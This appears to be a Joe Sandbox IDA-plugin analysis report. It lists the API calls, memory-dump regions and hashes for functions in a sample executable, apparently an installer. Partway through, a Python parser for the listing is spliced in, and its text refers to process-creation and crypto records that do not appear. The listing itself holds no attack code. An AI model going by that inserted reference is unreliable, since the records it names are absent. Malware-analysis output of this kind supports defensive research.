                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                                            • SetForegroundWindow.USER32(?), ref: 00456841
                                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                                            Strings
                                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                            • API String ID: 2236967946-3182603685
                                                                                            • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                            • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                                            • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                            • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                            • API String ID: 1646373207-3712701948
                                                                                            • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                            • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                                            • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                            • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID: ,
                                                                                            • API String ID: 568898626-3772416878
                                                                                            • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                            • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                            • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                            • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                                            • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                            • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                                            • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                            • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                                            • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                            • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                                            • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                            • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 1177325624-0
                                                                                            • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                            • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                                            • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                            • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00481CEE
                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$IconicLong
                                                                                            • String ID:
                                                                                            • API String ID: 2754861897-0
                                                                                            • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                            • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                                            • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                            • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                                            • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                            • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                                            • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                            • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241F4
                                                                                            • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                              • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021925AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                                            • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                            • String ID:
                                                                                            • API String ID: 649377781-0
                                                                                            • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                            • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                                            • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                            • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
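The record above is the per-function format this report repeats for every analysed function: one bullet per API call (nested "Part of subcall function" bullets for calls made by callees), a `ref:` call-site address, and a memory-dump source line naming the `.sdmp` region the code was lifted from. As an added example, not part of the Joe Sandbox report or its tooling, the following Python parses those lines into structured records so the listing can be filtered and correlated offline. The sample input is copied from the record above; the layout of the `.sdmp` file name (4th field = region base VA, 5th field = PAGE_* protection) is my assumption, chosen because it is consistent with the values on this page (0x20 on the 0x401000 code region, 0x02 on the 0x400000 header).

```python
"""Parse the per-function API listing that Joe Sandbox emits for each
analysed function ("APIs" / "Memory Dump Source" records) into structured
records that can be filtered and correlated offline."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Windows PAGE_* memory-protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Sample input: lines copied from the first record of this report
# (function at 004241F4..0042422E) and its dump-source line.
SAMPLE = """\
APIs
• IsIconic.USER32(?), ref: 004241F4
• SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021925AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
• SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# ASSUMED layout of the .sdmp name: eight dot-separated fields, of which the
# 4th is the region base VA and the 5th its PAGE_* protection.
SDMP_RE = re.compile(
    r"Source File:\s*(?P<name>(?:[0-9A-Fa-f]+\.){8}sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]            # raw argument tokens, "?" = unresolved by the sandbox
    ref: int                   # VA of the call instruction
    subcall_of: Optional[int]  # VA of the callee when this is a nested "Part of subcall" line


def parse_api_calls(text: str) -> List[ApiCall]:
    """Turn every API bullet (top-level or nested) into an ApiCall; other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        sub = m.group("sub")
        calls.append(ApiCall(
            func=m.group("func"),
            module=m.group("mod"),
            args=[a.strip() for a in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def top_level_apis(calls: List[ApiCall]) -> List[str]:
    """APIs invoked directly by the function, in listing order (nested subcall lines excluded)."""
    return [c.func for c in calls if c.subcall_of is None]


def concrete_args(call: ApiCall) -> List[int]:
    """Arguments the sandbox resolved to 32-bit values; '?' and garbled tokens are dropped."""
    return [int(a, 16) for a in call.args if re.fullmatch(r"[0-9A-Fa-f]{8}", a)]


def parse_source_line(line: str) -> Optional[Dict[str, object]]:
    """Decode a 'Source File: ....sdmp, Offset: ...' line into base VA, protection and image base."""
    m = SDMP_RE.search(line)
    if not m:
        return None
    fields = m.group("name").split(".")[:-1]   # drop the 'sdmp' extension
    protect = int(fields[4], 16)
    return {
        "fields": fields,
        "base": int(fields[3], 16),
        "protect": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
        "image_base": int(m.group("off"), 16),
    }


if __name__ == "__main__":
    for c in parse_api_calls(SAMPLE):
        nest = f"  (via sub_{c.subcall_of:08X})" if c.subcall_of else ""
        print(f"{c.ref:08X}  {c.module}!{c.func}({len(c.args)} args){nest}")
    print(parse_source_line(SAMPLE.splitlines()[-1]))
```

Running the parser over a whole report and grouping by `module!func` gives a quick view of which records touch process creation, file mapping or crypto helpers (the `_ISCRYPT` and `CreateProcessA` records further down) without scrolling through the GUI housekeeping calls.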
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID:
                                                                                            • API String ID: 568898626-0
                                                                                            • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                            • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                            • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                            • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureIconic
                                                                                            • String ID:
                                                                                            • API String ID: 2277910766-0
                                                                                            • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                            • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                                            • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                            • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241AB
                                                                                              • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                              • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                              • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                              • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                            • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2671590913-0
                                                                                            • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                            • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                            • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                            • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                            • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                                            • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                                            • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
